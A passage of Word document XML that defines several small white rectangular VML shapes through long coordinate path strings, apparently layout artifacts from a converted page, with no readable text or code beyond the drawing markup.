2800,11556,2800,11558,2800,11559,2800,11561,2800,11563,2800,11565,2800,11567,2800,11570,2800,11572,2800,11574,2800,11576,2800,11579,2800,11581,2800,11584,2800,11586,2800,11589,2800,11592,2800,11594,2800,11597,2800,11600,2800,11603,2800,11606,2800,11610,2800,11613,2800,11616,2800,11619,2800,11623,2800,11627,2800,11630,2800,11634,2800,11638,2800,11642,2800,11646,2800,11650,2800,11654,2800,11658,2800,11662,2800,11667,2800,11671,2800,11676,2800,11680,2800,11685,2800,11690,2800,11695,2800,11700,2800,11705,2800,11711,2800,11716,2800,11721,2800,11727,2800,11733,2800,11738,2800,11744,2800,11750,2800,11756,2800,11762,2800,11769,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2800,11775,2799,11775,2799,11775,2799,11775,2799,11775,2799,11775,2799,11775,2798,11775,2798,11775,2798,11775,2798,11775,2798,11775,2797,11775,2797,11775,2797,11775,2797,11775,2796,11775,2796,11775,2795,11775,2795,11775,2795,11775,2794,11775,2794,11775,2793,11775,2793,11775,2793,11775,2792,11775,2792,11775,2791,11775,2790,11775,2790,11775,2789,11775,2789,11775,2788,11775,2787,11775,2787,11775,2786,11775,2785,11775,2784,11775,2783,11775,2783,11775,2782,11775,2781,11775,2780,11775,2779,11775,2778,11775,2777,11775,2776,11775,2775,11775,2774,11775,2773,11775,2772,11775,2770,11775,2769,11775,2768,11775,2767,11775,2765,11775,2764,11775,2763,11775,2761,11775,2760,11775,2758,11775,2757,11775,2755,11775,2753,11775,2752,11775,2750,11775,2748,11775,2747,11775,2745,11775,2743,11775,2741,11775,2739,11775,2737,11775,2735,11775,2733,11775,2731,11775,2729,11775,2727,11775,2725,11775,2723,11775,2720,11775,2718,11775,2716,11775,2713,11775,2711,11775,2708,11775,2706,11775,2703,11775,2700,11775,2698,11775,2695,11775,2692,11775,2689,11775,2686,11775,2683,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11775,2680,11774,2680,11774,2680,11774,2680,11774,2680,11774,2680,11774,2680,11774,2680,11773,2680,11773,2680,11773,2680,11773,2680,11772,2680,11772,2680,11772,2680,11771,2680,11771,2680,11770,2680,11770,2680,11769,2680,11769,2680,11768,2680,11768,2680,11767,2680,11767,2680,11766,2680,11765,2680,11764,2680,11764,2680,11763,2680,11762,2680,11761,2680,11760,2680,11759,2680,11758,2680,11757,2680,11756,2680,11755,2680,11754,2680,11752,2680,11751,2680,11750,2680,11748,2680,11747,2680,11745,2680,11744,2680,11742,2680,11741,2680,11739,2680,11737,2680,11735,2680,11733,2680,11731,2680,11729,2680,11727,2680,11725,2680,11723,2680,11721,2680,11718,2680,11716,2680,11714,2680,11711,2680,11708,2680,11706,2680,11703,2680,11700,2680,11697,2680,11694,2680,11691,2680,11688,2680,11685,2680,11682,2680,11679,2680,11675,2680,11672,2680,11668,2680,11665,2680,11661,2680,11657,2680,11653,2680,11649,2680,11645,2680,11641,2680,11637,2680,11632,2680,11628,2680,11624,2680,11619,2680,11614,2680,11609,2680,11605,2680,11600,2680,11595,2680,11589,2680,11584,2680,11579,2680,11573,2680,11568,2680,11562,2680,11556,2680,11551,2680,11545,2680,11539,2680,11532,2680,11526,2680,11520e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:607.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,12150" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:12150;width:130;height:270" coordorigin="2670,12150" coordsize="130,270" path="m2680,12165l2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2680,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2681,12165,2682,12165,2682,12165,2682,12165,2682,12165,2682,12165,2682,12165,2683,12165,2683,12165,2683,12165,2683,12165,2684,12165,2684,12165,2684,12165,2685,12165,2685,12165,2685,12165,2686,12165,2686,12165,2686,12165,2687,12165,2687,12165,2688,12165,2688,12165,2689,12165,2689,12165,2690,12165,2690,12165,2691,12165,2692,12165,2692,12165,2693,12165,2694,12165,2694,12165,2695,12165,2696,12165,2697,12165,2697,12165,2698,12165,2699,12165,2700,12165,2701,12165,2702,12165,2703,12165,2704,12165,2705,12165,2706,12165,2707,12165,2708,12165,2709,12165,2710,12165,2712,12165,2713,12165,2714,12165,2715,12165,2717,12165,2718,12165,2720,12165,2721,12165,2723,12165,2724,12165,2726,12165,2727,12165,2729,12165,2731,12165,2732,12165,2734,12165,2736,12165,2738,12165,2740,12165,2741,12165,2743,12165,2745,12165,2747,12165,2749,12165,2752,12165,2754,12165,2756,12165,2758,12165,2760,12165,2763,12165,2765,12165,2768,12165,2770,12165,2773,12165,2775,12165,2778,12165,2780,12165,2783,12165,2786,12165,2789,12165,2792,12165,2794,12165,2797,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12165,2800,12166,2800,12166,2800,12166,2800,12166,2800,12166,2800,12166,2800,12166,2800,12167,2800,12167,2800,12167,2800,12167,2800,12167,2800,12168,2800,12168,2800,12168,2800,12169,2800,12169,2800,12170,2800,12170,2800,12171,2800,12171,2800,12172,2800,12172,2800,12173,2800,12173,2800,12174,2800,12175,2800,12176,2800,12176,2800,12177,2800,12178,2800,12179,2800,12180,2800,12181,2800,12182,2800,12183,2800,12184,2800,12185,2800,12186,2800,12188,2800,12189,2800,12190,2800,12192,2800,12193,2800,12195,2800,12196,2800,12198,2800,12199,2800,12201,2800,12203,2800,12205,2800,12207,2800,12209,2800,12211,2800,12213,2800,12215,2800,12217,2800,12219,2800,12222,2800,12224,2800,12226,2800,12229,2800,12232,2800,12234,2800,12237,2800,12240,2800,12243,2800,12246,2800,12249,2800,12252,2800,12255,2800,12258,2800,12261,2800,12265,2800,12268,2800,12272,2800,12275,2800,12279,2800,12283,2800,12287,2800,12291,2800,12295,2800,12299,2800,12303,2800,12308,2800,12312,2800,12317,2800,12321,2800,12326,2800,12331,2800,12335,2800,12340,2800,12345,2800,12351,2800,12356,2800,12361,2800,12367,2800,12372,2800,12378,2800,12384,2800,12389,2800,12395,2800,12401,2800,12408,2800,12414,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2800,12420,2799,12420,2799,12420,2799,12420,2799,12420,2799,12420,2799,12420,2798,12420,2798,12420,2798,12420,2798,12420,2798,12420,2797,12420,2797,12420,2797,12420,2797,12420,2796,12420,2796,12420,2795,12420,2795,12420,2795,12420,2794,12420,2794,12420,2793,12420,2793,12420,2793,12420,2792,12420,2792,12420,2791,12420,2790,12420,2790,12420,2789,12420,2789,12420,2788,12420,2787,12420,2787,12420,2786,12420,2785,12420,2784,12420,2783,12420,2783,12420,2782,12420,2781,12420,2780,12420,2779,12420,2778,12420,2777,12420,2776,12420,2775,12420,2774,12420,2773,12420,2772,12420,2770,12420,2769,12420,2768,12420,2767,12420,2765,12420,2764,12420,2763,12420,2761,12420,2760,12420,2758,12420,2757,12420,2755,12420,2753,12420,2752,12420,2750,12420,2748,12420,2747,12420,2745,12420,2743,12420,2741,12420,2739,12420,2737,12420,2735,12420,2733,12420,2731,12420,2729,12420,2727,12420,2725,12420,2723,12420,2720,12420,2718,12420,2716,12420,2713,12420,2711,12420,2708,12420,2706,12420,2703,12420,2700,12420,2698,12420,2695,12420,2692,12420,2689,12420,2686,12420,2683,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12420,2680,12419,2680,12419,2680,12419,2680,12419,2680,12419,2680,12418,2680,12418,2680,12418,2680,12418,2680,12417,2680,12417,2680,12417,2680,12416,2680,12416,2680,12415,2680,12415,2680,12414,2680,12414,2680,12413,2680,12413,2680,12412,2680,12411,2680,12411,2680,12410,2680,12409,2680,12408,2680,12407,2680,12406,2680,12406,2680,12405,2680,12404,2680,12402,2680,12401,2680,12400,2680,12399,2680,12398,2680,12396,2680,12395,2680,12394,2680,12392,2680,12391,2680,12389,2680,12388,2680,12386,2680,12384,2680,12382,2680,12381,2680,12379,2680,12377,2680,12375,2680,12373,2680,12371,2680,12368,2680,12366,2680,12364,2680,12361,2680,12359,2680,12356,2680,12354,2680,12351,2680,12348,2680,12346,2680,12343,2680,12340,2680,12337,2680,12334,2680,12331,2680,12327,2680,12324,2680,12321,2680,12317,2680,12314,2680,12310,2680,12306,2680,12302,2680,12298,2680,12295,2680,12290,2680,12286,2680,12282,2680,12278,2680,12273,2680,12269,2680,12264,2680,12260,2680,12255,2680,12250,2680,12245,2680,12240,2680,12235,2680,12230,2680,12224,2680,12219,2680,12213,2680,12208,2680,12202,2680,12196,2680,12190,2680,12184,2680,12178,2680,12172,2680,12165e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:638.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,12770" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:12770;width:130;height:270" coordorigin="2670,12770" coordsize="130,270" path="m2680,12795l2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2680,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2681,12795,2682,12795,2682,12795,2682,12795,2682,12795,2682,12795,2682,12795,2683,12795,2683,12795,2683,12795,2683,12795,2684,12795,2684,12795,2684,12795,2685,12795,2685,12795,2685,12795,2686,12795,2686,12795,2686,12795,2687,12795,2687,12795,2688,12795,2688,12795,2689,12795,2689,12795,2690,12795,2690,12795,2691,12795,2692,12795,2692,12795,2693,12795,2694,12795,2694,12795,2695,12795,2696,12795,2697,12795,2697,12795,2698,12795,2699,12795,2700,12795,2701,12795,2702,12795,2703,12795,2704,12795,2705,12795,2706,12795,2707,12795,2708,12795,2709,12795,2710,12795,2712,12795,2713,12795,2714,12795,2715,12795,2717,12795,2718,12795,2720,12795,2721,12795,2723,12795,2724,12795,2726,12795,2727,12795,2729,12795,2731,12795,2732,12795,2734,12795,2736,12795,2738,12795,2740,12795,2741,12795,2743,12795,2745,12795,2747,12795,2749,12795,2752,12795,2754,12795,2756,12795,2758,12795,2760,12795,2763,12795,2765,12795,2768,12795,2770,12795,2773,12795,2775,12795,2778,12795,2780,12795,2783,12795,2786,12795,2789,12795,2792,12795,2794,12795,2797,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12796,2800,12797,2800,12797,2800,12797,2800,12797,2800,12798,2800,12798,2800,12798,2800,12798,2800,12799,2800,12799,2800,12800,2800,12800,2800,12800,2800,12801,2800,12801,2800,12802,2800,12803,2800,12803,2800,12804,2800,12804,2800,12805,2800,12806,2800,12807,2800,12807,2800,12808,2800,12809,2800,12810,2800,12811,2800,12812,2800,12813,2800,12814,2800,12816,2800,12817,2800,12818,2800,12819,2800,12821,2800,12822,2800,12823,2800,12825,2800,12827,2800,12828,2800,12830,2800,12832,2800,12833,2800,12835,2800,12837,2800,12839,2800,12841,2800,12843,2800,12845,2800,12847,2800,12850,2800,12852,2800,12854,2800,12857,2800,12859,2800,12862,2800,12865,2800,12867,2800,12870,2800,12873,2800,12876,2800,12879,2800,12882,2800,12885,2800,12888,2800,12892,2800,12895,2800,12899,2800,12902,2800,12906,2800,12910,2800,12913,2800,12917,2800,12921,2800,12925,2800,12929,2800,12934,2800,12938,2800,12942,2800,12947,2800,12951,2800,12956,2800,12961,2800,12966,2800,12971,2800,12976,2800,12981,2800,12986,2800,12992,2800,12997,2800,13003,2800,13008,2800,13014,2800,13020,2800,13026,2800,13032,2800,13038,2800,13044,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2799,13051,2799,13051,2799,13051,2799,13051,2799,13051,2799,13051,2798,13051,2798,13051,2798,13051,2798,13051,2798,13051,2797,13051,2797,13051,2797,13051,2797,13051,2796,13051,2796,13051,2795,13051,2795,13051,2795,13051,2794,13051,2794,13051,2793,13051,2793,13051,2793,13051,2792,13051,2792,13051,2791,13051,2790,13051,2790,13051,2789,13051,2789,13051,2788,13051,2787,13051,2787,13051,2786,13051,2785,13051,2784,13051,2783,13051,2783,13051,2782,13051,2781,13051,2780,13051,2779,13051,2778,13051,2777,13051,2776,13051,2775,13051,2774,13051,2773,13051,2772,13051,2770,13051,2769,13051,2768,13051,2767,13051,2765,13051,2764,13051,2763,13051,2761,13051,2760,13051,2758,13051,2757,13051,2755,13051,2753,13051,2752,13051,2750,13051,2748,13051,2747,13051,2745,13051,2743,13051,2741,13051,2739,13051,2737,13051,2735,13051,2733,13051,2731,13051,2729,13051,2727,13051,2725,13051,2723,13051,2720,13051,2718,13051,2716,13051,2713,13051,2711,13051,2708,13051,2706,13051,2703,13051,2700,13051,2698,13051,2695,13051,2692,13051,2689,13051,2686,13051,2683,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13049,2680,13049,2680,13049,2680,13049,2680,13048,2680,13048,2680,13048,2680,13048,2680,13047,2680,13047,2680,13046,2680,13046,2680,13046,2680,13045,2680,13045,2680,13044,2680,13044,2680,13043,2680,13042,2680,13042,2680,13041,2680,13040,2680,13039,2680,13039,2680,13038,2680,13037,2680,13036,2680,13035,2680,13034,2680,13033,2680,13032,2680,13030,2680,13029,2680,13028,2680,13027,2680,13025,2680,13024,2680,13023,2680,13021,2680,13019,2680,13018,2680,13016,2680,13014,2680,13013,2680,13011,2680,13009,2680,13007,2680,13005,2680,13003,2680,13001,2680,12999,2680,12996,2680,12994,2680,12992,2680,12989,2680,12987,2680,12984,2680,12981,2680,12979,2680,12976,2680,12973,2680,12970,2680,12967,2680,12964,2680,12961,2680,12958,2680,12954,2680,12951,2680,12947,2680,12944,2680,12940,2680,12936,2680,12933,2680,12929,2680,12925,2680,12921,2680,12917,2680,12912,2680,12908,2680,12904,2680,12899,2680,12895,2680,12890,2680,12885,2680,12880,2680,12875,2680,12870,2680,12865,2680,12860,2680,12855,2680,12849,2680,12844,2680,12838,2680,12832,2680,12826,2680,12820,2680,12814,2680,12808,2680,12802,2680,12795e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:671.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,13430" coordsize="130,250">
        <v:shape style="position:absolute;left:2670;top:13430;width:130;height:250" coordorigin="2670,13430" coordsize="130,250" path="m2680,13441l2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2682,13441,2682,13441,2682,13441,2682,13441,2682,13441,2682,13441,2683,13441,2683,13441,2683,13441,2683,13441,2684,13441,2684,13441,2684,13441,2685,13441,2685,13441,2685,13441,2686,13441,2686,13441,2686,13441,2687,13441,2687,13441,2688,13441,2688,13441,2689,13441,2689,13441,2690,13441,2690,13441,2691,13441,2692,13441,2692,13441,2693,13441,2694,13441,2694,13441,2695,13441,2696,13441,2697,13441,2697,13441,2698,13441,2699,13441,2700,13441,2701,13441,2702,13441,2703,13441,2704,13441,2705,13441,2706,13441,2707,13441,2708,13441,2709,13441,2710,13441,2712,13441,2713,13441,2714,13441,2715,13441,2717,13441,2718,13441,2720,13441,2721,13441,2723,13441,2724,13441,2726,13441,2727,13441,2729,13441,2731,13441,2732,13441,2734,13441,2736,13441,2738,13441,2740,13441,2741,13441,2743,13441,2745,13441,2747,13441,2749,13441,2752,13441,2754,13441,2756,13441,2758,13441,2760,13441,2763,13441,2765,13441,2768,13441,2770,13441,2773,13441,2775,13441,2778,13441,2780,13441,2783,13441,2786,13441,2789,13441,2792,13441,2794,13441,2797,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13442,2800,13442,2800,13442,2800,13442,2800,13442,2800,13442,2800,13443,2800,13443,2800,13443,2800,13443,2800,13444,2800,13444,2800,13444,2800,13445,2800,13445,2800,13446,2800,13446,2800,13447,2800,13447,2800,13448,2800,13448,2800,13449,2800,13450,2800,13450,2800,13451,2800,13452,2800,13453,2800,13454,2800,13455,2800,13456,2800,13456,2800,13458,2800,13459,2800,13460,2800,13461,2800,13462,2800,13463,2800,13465,2800,13466,2800,13467,2800,13469,2800,13470,2800,13472,2800,13473,2800,13475,2800,13477,2800,13479,2800,13480,2800,13482,2800,13484,2800,13486,2800,13488,2800,13491,2800,13493,2800,13495,2800,13497,2800,13500,2800,13502,2800,13505,2800,13507,2800,13510,2800,13513,2800,13515,2800,13518,2800,13521,2800,13524,2800,13527,2800,13531,2800,13534,2800,13537,2800,13540,2800,13544,2800,13548,2800,13551,2800,13555,2800,13559,2800,13563,2800,13567,2800,13571,2800,13575,2800,13579,2800,13583,2800,13588,2800,13592,2800,13597,2800,13601,2800,13606,2800,13611,2800,13616,2800,13621,2800,13626,2800,13631,2800,13637,2800,13642,2800,13648,2800,13653,2800,13659,2800,13665,2800,13671,2800,13677,2800,13683,2800,13690,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2799,13696,2799,13696,2799,13696,2799,13696,2799,13696,2799,13696,2798,13696,2798,13696,2798,13696,2798,13696,2798,13696,2797,13696,2797,13696,2797,13696,2797,13696,2796,13696,2796,13696,2795,13696,2795,13696,2795,13696,2794,13696,2794,13696,2793,13696,2793,13696,2793,13696,2792,13696,2792,13696,2791,13696,2790,13696,2790,13696,2789,13696,2789,13696,2788,13696,2787,13696,2787,13696,2786,13696,2785,13696,2784,13696,2783,13696,2783,13696,2782,13696,2781,13696,2780,13696,2779,13696,2778,13696,2777,13696,2776,13696,2775,13696,2774,13696,2773,13696,2772,13696,2770,13696,2769,13696,2768,13696,2767,13696,2765,13696,2764,13696,2763,13696,2761,13696,2760,13696,2758,13696,2757,13696,2755,13696,2753,13696,2752,13696,2750,13696,2748,13696,2747,13696,2745,13696,2743,13696,2741,13696,2739,13696,2737,13696,2735,13696,2733,13696,2731,13696,2729,13696,2727,13696,2725,13696,2723,13696,2720,13696,2718,13696,2716,13696,2713,13696,2711,13696,2708,13696,2706,13696,2703,13696,2700,13696,2698,13696,2695,13696,2692,13696,2689,13696,2686,13696,2683,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13694,2680,13694,2680,13694,2680,13694,2680,13694,2680,13693,2680,13693,2680,13693,2680,13692,2680,13692,2680,13691,2680,13691,2680,13690,2680,13690,2680,13689,2680,13689,2680,13688,2680,13688,2680,13687,2680,13686,2680,13685,2680,13685,2680,13684,2680,13683,2680,13682,2680,13681,2680,13680,2680,13679,2680,13678,2680,13677,2680,13676,2680,13675,2680,13673,2680,13672,2680,13671,2680,13669,2680,13668,2680,13666,2680,13665,2680,13663,2680,13662,2680,13660,2680,13658,2680,13656,2680,13654,2680,13652,2680,13650,2680,13648,2680,13646,2680,13644,2680,13642,2680,13639,2680,13637,2680,13635,2680,13632,2680,13629,2680,13627,2680,13624,2680,13621,2680,13618,2680,13615,2680,13612,2680,13609,2680,13606,2680,13603,2680,13600,2680,13596,2680,13593,2680,13589,2680,13586,2680,13582,2680,13578,2680,13574,2680,13570,2680,13566,2680,13562,2680,13558,2680,13553,2680,13549,2680,13545,2680,13540,2680,13535,2680,13530,2680,13526,2680,13521,2680,13516,2680,13510,2680,13505,2680,13500,2680,13494,2680,13489,2680,13483,2680,13477,2680,13472,2680,13466,2680,13460,2680,13453,2680,13447,2680,13441e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:702.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,14050" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:14050;width:130;height:270" coordorigin="2790,14050" coordsize="130,270" path="m2800,14071l2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2802,14071,2802,14071,2802,14071,2802,14071,2802,14071,2802,14071,2803,14071,2803,14071,2803,14071,2803,14071,2803,14071,2804,14071,2804,14071,2804,14071,2805,14071,2805,14071,2805,14071,2806,14071,2806,14071,2806,14071,2807,14071,2807,14071,2808,14071,2808,14071,2809,14071,2809,14071,2810,14071,2810,14071,2811,14071,2812,14071,2812,14071,2813,14071,2814,14071,2814,14071,2815,14071,2816,14071,2817,14071,2817,14071,2818,14071,2819,14071,2820,14071,2821,14071,2822,14071,2823,14071,2824,14071,2825,14071,2826,14071,2827,14071,2828,14071,2829,14071,2830,14071,2832,14071,2833,14071,2834,14071,2836,14071,2837,14071,2838,14071,2840,14071,2841,14071,2843,14071,2844,14071,2846,14071,2847,14071,2849,14071,2851,14071,2852,14071,2854,14071,2856,14071,2858,14071,2860,14071,2861,14071,2863,14071,2865,14071,2867,14071,2870,14071,2872,14071,2874,14071,2876,14071,2878,14071,2881,14071,2883,14071,2885,14071,2888,14071,2890,14071,2893,14071,2895,14071,2898,14071,2901,14071,2903,14071,2906,14071,2909,14071,2912,14071,2915,14071,2917,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14072,2920,14072,2920,14072,2920,14072,2920,14072,2920,14072,2920,14072,2920,14072,2920,14073,2920,14073,2920,14073,2920,14073,2920,14074,2920,14074,2920,14074,2920,14075,2920,14075,2920,14076,2920,14076,2920,14077,2920,14077,2920,14078,2920,14078,2920,14079,2920,14079,2920,14080,2920,14081,2920,14082,2920,14082,2920,14083,2920,14084,2920,14085,2920,14086,2920,14087,2920,14088,2920,14089,2920,14090,2920,14091,2920,14092,2920,14094,2920,14095,2920,14096,2920,14098,2920,14099,2920,14101,2920,14102,2920,14104,2920,14105,2920,14107,2920,14109,2920,14111,2920,14113,2920,14115,2920,14117,2920,14119,2920,14121,2920,14123,2920,14125,2920,14128,2920,14130,2920,14132,2920,14135,2920,14138,2920,14140,2920,14143,2920,14146,2920,14149,2920,14152,2920,14155,2920,14158,2920,14161,2920,14164,2920,14167,2920,14171,2920,14174,2920,14178,2920,14181,2920,14185,2920,14189,2920,14193,2920,14197,2920,14201,2920,14205,2920,14209,2920,14214,2920,14218,2920,14222,2920,14227,2920,14232,2920,14237,2920,14241,2920,14246,2920,14251,2920,14257,2920,14262,2920,14267,2920,14273,2920,14278,2920,14284,2920,14290,2920,14295,2920,14301,2920,14307,2920,14314,2920,14320,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2919,14326,2919,14326,2919,14326,2919,14326,2919,14326,2919,14326,2919,14326,2918,14326,2918,14326,2918,14326,2918,14326,2917,14326,2917,14326,2917,14326,2917,14326,2916,14326,2916,14326,2916,14326,2915,14326,2915,14326,2914,14326,2914,14326,2914,14326,2913,14326,2913,14326,2912,14326,2912,14326,2911,14326,2910,14326,2910,14326,2909,14326,2909,14326,2908,14326,2907,14326,2907,14326,2906,14326,2905,14326,2904,14326,2903,14326,2903,14326,2902,14326,2901,14326,2900,14326,2899,14326,2898,14326,2897,14326,2896,14326,2895,14326,2894,14326,2893,14326,2892,14326,2890,14326,2889,14326,2888,14326,2887,14326,2885,14326,2884,14326,2883,14326,2881,14326,2880,14326,2878,14326,2877,14326,2875,14326,2874,14326,2872,14326,2870,14326,2869,14326,2867,14326,2865,14326,2863,14326,2861,14326,2859,14326,2857,14326,2855,14326,2853,14326,2851,14326,2849,14326,2847,14326,2845,14326,2843,14326,2840,14326,2838,14326,2836,14326,2833,14326,2831,14326,2828,14326,2826,14326,2823,14326,2820,14326,2818,14326,2815,14326,2812,14326,2809,14326,2806,14326,2803,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14325,2800,14325,2800,14325,2800,14325,2800,14325,2800,14325,2800,14324,2800,14324,2800,14324,2800,14324,2800,14323,2800,14323,2800,14323,2800,14322,2800,14322,2800,14321,2800,14321,2800,14320,2800,14320,2800,14319,2800,14319,2800,14318,2800,14317,2800,14317,2800,14316,2800,14315,2800,14314,2800,14313,2800,14312,2800,14311,2800,14310,2800,14309,2800,14308,2800,14307,2800,14306,2800,14305,2800,14304,2800,14302,2800,14301,2800,14300,2800,14298,2800,14297,2800,14295,2800,14294,2800,14292,2800,14290,2800,14288,2800,14287,2800,14285,2800,14283,2800,14281,2800,14279,2800,14276,2800,14274,2800,14272,2800,14270,2800,14267,2800,14265,2800,14262,2800,14260,2800,14257,2800,14254,2800,14252,2800,14249,2800,14246,2800,14243,2800,14240,2800,14236,2800,14233,2800,14230,2800,14227,2800,14223,2800,14219,2800,14216,2800,14212,2800,14208,2800,14204,2800,14200,2800,14196,2800,14192,2800,14188,2800,14184,2800,14179,2800,14175,2800,14170,2800,14166,2800,14161,2800,14156,2800,14151,2800,14146,2800,14141,2800,14135,2800,14130,2800,14125,2800,14119,2800,14114,2800,14108,2800,14102,2800,14096,2800,14090,2800,14084,2800,14077,2800,14071e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:734.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,14690" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:14690;width:130;height:270" coordorigin="2790,14690" coordsize="130,270" path="m2800,14716l2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2802,14716,2802,14716,2802,14716,2802,14716,2802,14716,2802,14716,2803,14716,2803,14716,2803,14716,2803,14716,2803,14716,2804,14716,2804,14716,2804,14716,2805,14716,2805,14716,2805,14716,2806,14716,2806,14716,2806,14716,2807,14716,2807,14716,2808,14716,2808,14716,2809,14716,2809,14716,2810,14716,2810,14716,2811,14716,2812,14716,2812,14716,2813,14716,2814,14716,2814,14716,2815,14716,2816,14716,2817,14716,2817,14716,2818,14716,2819,14716,2820,14716,2821,14716,2822,14716,2823,14716,2824,14716,2825,14716,2826,14716,2827,14716,2828,14716,2829,14716,2830,14716,2832,14716,2833,14716,2834,14716,2836,14716,2837,14716,2838,14716,2840,14716,2841,14